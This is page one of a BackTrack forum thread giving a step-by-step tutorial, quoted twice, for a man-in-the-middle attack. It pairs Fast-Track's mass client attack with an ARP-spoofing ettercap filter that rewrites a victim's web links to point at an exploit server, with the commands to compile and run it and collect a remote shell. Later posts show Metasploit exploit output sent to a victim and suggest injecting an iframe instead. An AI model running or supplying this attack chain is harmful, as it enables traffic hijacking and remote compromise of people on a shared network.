Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: fast-track mass client attck + ettercap

  1. #1
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default fast-track mass client attck + ettercap

    first start up fast-strack and run the web gui mode -g
    Code:
    ./fast-track.py -g
    now open a web browser to this page http://127.0.0.1:44444/metaclient

    simply enter your ip address to listen on and click "launch attack"... for example ill use 192.168.1.5
    you should see 3 console pop up... you can minimize them

    now we need to compile our filter that we will use with ettercap
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
    	  # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("a href=", "a href=\"http://192.168.1.5\" ");
       replace("a href=", "a href=\"http://192.168.1.5\" ");
       msg("Filter Ran.\n");
    }
    you must make sure you replace the ip addres in the filter to match yours of the server... save this as massclient.filter

    then in a new console compile the filter with this command
    Code:
    etterfilter massclient.filter -o massclient.ef

    now start ettercap with this command
    Code:
    ettercap -T -q -F massclient.ef -M ARP /192.168.1.2/ //
    now wait for your target to visit the evil webpage that fast-track has setup and check your sessions -l for a shell

    i dont take credit for this... i just took some one els tutorial and made a quick change to the filter... for more info check these links
    http://www.irongeek.com/i.php?page=s...ettercapfilter
    http://forums.remote-exploit.org/sho...t=12885&page=9
    i think dr_green also has one but cant find it at this time

    this was a quick walk threw... i hope some one finds this useful... let me know if i made mistakes... the filter is also kinda buggy but it gets the job done...

  2. #2
    Junior Member
    Join Date
    May 2008
    Posts
    56

    Default

    Pwnage. lol. I got a shell and you didn't haha. Just kidding. Thanks for teaching me how to do this, I really appreciate it.
    A+
    Network +
    Security +
    Linux +

    Work in progress: Saving for OSCP

    Currently reading:Hacking-The Art Of Exploitation.

  3. #3
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    5

    Default

    Is there a version of this that works on metasploit instead of backtrack?

  4. #4
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    Mikee, So i guess you are using windows?

  5. #5
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    5

    Default

    Quote Originally Posted by BigMac View Post
    Mikee, So i guess you are using windows?

    yes, is it possible to use this?

  6. #6
    Member
    Join Date
    Nov 2007
    Posts
    65

    Default

    This is Backtrack Forum, not how to do things on Windows. You should use google asking the same question, you will get more success.

    Or simply start using backtrack, you can do it, like most of us do.

  7. #7
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    23

    Default

    Ok, got everything working but can't get a shell, what am I doing wrong?
    stalls here:
    [*] Attempting to exploit ani_loadimage_chunksize
    [*] Sending exploit to 192.168.1.105:1626...
    [*] Started bind handler
    [*] Sending ANI file to 192.168.1.105:1625...
    [*] Attempting to exploit ani_loadimage_chunksize
    [*] Sending HTML page to 192.168.1.105:1625...
    [*] Sending exploit to 192.168.1.105:1626...
    [*] Sending exploit HTML to 192.168.1.105:1628...
    [*] Sending HTML to 192.168.1.105:1631...
    [*] Sending HTML to 192.168.1.105:1632...
    [*] Sending HTML to 192.168.1.105:1633...
    [*] Sending exploit to 192.168.1.105:1634...
    [*] Attempting to exploit ani_loadimage_chunksize
    [*] Sending ANI file to 192.168.1.105:1638...
    Victim machine is definitely been pwned..lol..but it is asking to install activeX. Also, victim's are WINXP SP2, and a Vista machine, got the same output for both.

  8. #8
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    may just want to put an iframe insted hijacking ALL the links lol

    just put before </body> the iframe of the evil server ;P

    NOTE: mass client side will crash IE7 so beware .

  9. #9
    Member
    Join Date
    Feb 2006
    Posts
    167

    Default coo coo

    Quote Originally Posted by BigMac View Post
    first start up fast-strack and run the web gui mode -g
    Code:
    ./fast-track.py -g
    now open a web browser to this page http://127.0.0.1:44444/metaclient

    simply enter your ip address to listen on and click "launch attack"... for example ill use 192.168.1.5
    you should see 3 console pop up... you can minimize them

    now we need to compile our filter that we will use with ettercap
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
    	  # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("a href=", "a href=\"http://192.168.1.5\" ");
       replace("a href=", "a href=\"http://192.168.1.5\" ");
       msg("Filter Ran.\n");
    }
    you must make sure you replace the ip addres in the filter to match yours of the server... save this as massclient.filter

    then in a new console compile the filter with this command
    Code:
    etterfilter massclient.filter -o massclient.ef

    now start ettercap with this command
    Code:
    ettercap -T -q -F massclient.ef -M ARP /192.168.1.2/ //
    now wait for your target to visit the evil webpage that fast-track has setup and check your sessions -l for a shell

    i dont take credit for this... i just took some one els tutorial and made a quick change to the filter... for more info check these links
    http://www.irongeek.com/i.php?page=s...ettercapfilter
    http://forums.remote-exploit.org/sho...t=12885&page=9
    i think dr_green also has one but cant find it at this time

    this was a quick walk threw... i hope some one finds this useful... let me know if i made mistakes... the filter is also kinda buggy but it gets the job done...
    I'll pop this into Fast-Track next update, nice tutorial

  10. #10
    Member
    Join Date
    Feb 2006
    Posts
    167

    Default its done

    Got back from poker night last night after a couple beers and coded the ettercap filters into Fast-Track's Mass Client Attack, works great. Added it to the menu mode, gui, and command line. I'll push the updates on Monday. Nice job BigMac, appreciate the help on getting it to work, made it super simple for me to pop it into my code.

    Screenshots attached:

    http://img223.imageshack.us/img223/9709/ettercapcg2.jpg

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •